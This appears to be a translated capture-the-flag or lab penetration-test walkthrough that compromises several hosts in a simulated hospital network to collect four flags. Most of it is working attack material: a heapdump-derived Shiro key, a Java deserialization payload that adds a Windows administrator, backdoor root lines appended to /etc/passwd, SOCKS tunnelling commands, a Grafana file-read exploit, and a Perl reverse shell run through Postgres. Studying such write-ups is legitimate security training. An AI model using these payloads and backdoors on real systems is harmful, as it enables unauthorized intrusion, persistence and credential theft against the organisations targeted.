First, a port scan of the target IP turned up a single open port, 8080.
Then we found it was an Actuator leak.
We can analyse the heapdump directly with a tool:

```bash
java -jar heapdump_tool.jar heapdump
```

That gives us the Shiro key: GAYysgMQhG7/CzIJlVpR2g==
Then just throw it at a Shiro GUI exploitation tool and it is a one-click job.
Inject a memory shell, then pop a reverse shell back to us.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

First upgrade to an interactive shell, then look for SUID binaries:

```bash
find / -user root -perm -4000 -print 2>/dev/null
```

We find that vim.basic has the SUID bit set.
Here you could actually use vim.basic to write a public key into root's authorized_keys and escalate to root; if that works, everything afterwards becomes much more convenient.
But a shell environment like this is pure garbage, so I didn't bother.

```bash
vim.basic /root/.ssh/authorized_keys
```

flag1

```bash
vim.basic /root/flag/flag01.txt
```
Then upload fscan to the target:

```bash
$ ifconfig
$ chmod +x fscan
$ ./fscan -h 172.30.12.5/24
```

```text
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5 is alive
(icmp) Target 172.30.12.6 is alive
(icmp) Target 172.30.12.236 is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=A6EB92F10BCF56BE0C344E22A075FA3D
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=A6EB92F10BCF56BE0C344E22A075FA3D code:200 len:2005 title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
已完成 7/9 [-] ssh 172.30.12.5:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/9 [-] ssh 172.30.12.5:22 root a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/9 [-] ssh 172.30.12.236:22 root sa123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no suppor
```
The scan turned up three hosts in the C segment; we take them one at a time, starting with our old friend Nacos.
Let's set up the tunnel.
On the VPS:

```bash
./linux_x64_admin -l 8000 -s 123
```

On the client:

```bash
./linux_x64_agent -c vps_sever:8000 -s 123
```

Back on the VPS:

```bash
use 0
socks 8000 admin admin
```

Configure a SOCKS5 proxy locally, then log in to the Nacos console with the default weak credentials nacos/nacos.
Use the NacosExploitGUI tool to probe it.
We find that the YAML deserialization is exploitable. The earlier scan showed this host is a Windows workgroup machine.
Note:
the username and password of the account you register must not be related to each other, and the password should be as complex as possible.
```java
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

// The constructor runs as soon as the factory is loaded, which is what carries the payload;
// the remaining interface methods are only stubbed so the class compiles.
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("net user harder qwer@1234! /add");
            Runtime.getRuntime().exec("net localgroup administrators harder /add");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}
```

```bash
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf harder.jar -C src/ .
```
Put harder.jar in a directory on the intranet host and start a web server there:

```bash
python3 -m http.server 2356
```

Now we can add a user directly and then connect over RDP.
flag2
Then open the personal computer, open Notepad, and there is the flag.
Next, a round of information gathering; nothing useful turns up, so we move on to the other target. Logging in with admin/admin, we see the responses are JSON, so just run the FastjsonExp plugin over it and we're done.
Inject a Godzilla memory shell and connect. Here we find we are already root, so grab the flag first.
flag3
To maintain access, add a user directly from inside Godzilla:

```text
$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash
```

Username: hacker Password: 123456
We can also add a user with a single command:

```bash
echo 'hack:zSZ7Whrr8hgwY:0:0::/root/:/bin/bash' >>/etc/passwd
```
On web3, ifconfig shows two NICs, so we run fscan against the B segment.
We find another target in that B segment, so now we build a second-level tunnel on top of the first one:

```bash
./linux_x64_agent -c 172.30.12.5:7711 -s 123 --reconnect 8
```

On the target 172.30.12.5:

```bash
use 0
listen
1
7711
```

Node 1 then gets added, after which:

```bash
use 1
socks 7701 admin admin
```

The second-level tunnel is done.
An fscan sweep of the intranet reveals a new B segment, and we try to take that host. A weak password gets us straight in, and a search turns up CVE-2021-43798; we can use a tool to pull the sensitive information, or read it by hand.
By hand:
With the tool:

```bash
proxychains -f /etc/proxychains4.conf ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
```

That yields the Postgres credentials postgres:Postgres@123.
Log in to the database:

```bash
proxychains -f /etc/proxychains4.conf psql -h 172.30.54.12 -U postgres -W
```

Reverse shell back to target 3:

```sql
select system('perl -e \'use Socket;$i="172.30.12.236";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
```
Then it is just privilege escalation and reading the flag:

```text
postgres@web04:/usr/local/pgsql/data$ sudo /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql
Password: 123456
Welcome to psql 8.1.0, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit
root=# \?
Input/Output
--More--!/bin/bash
root@web04:/usr/local/pgsql/data# whoami
root
```

flag4
No screenshot of this step here, so I'll borrow another master's screenshot (jk).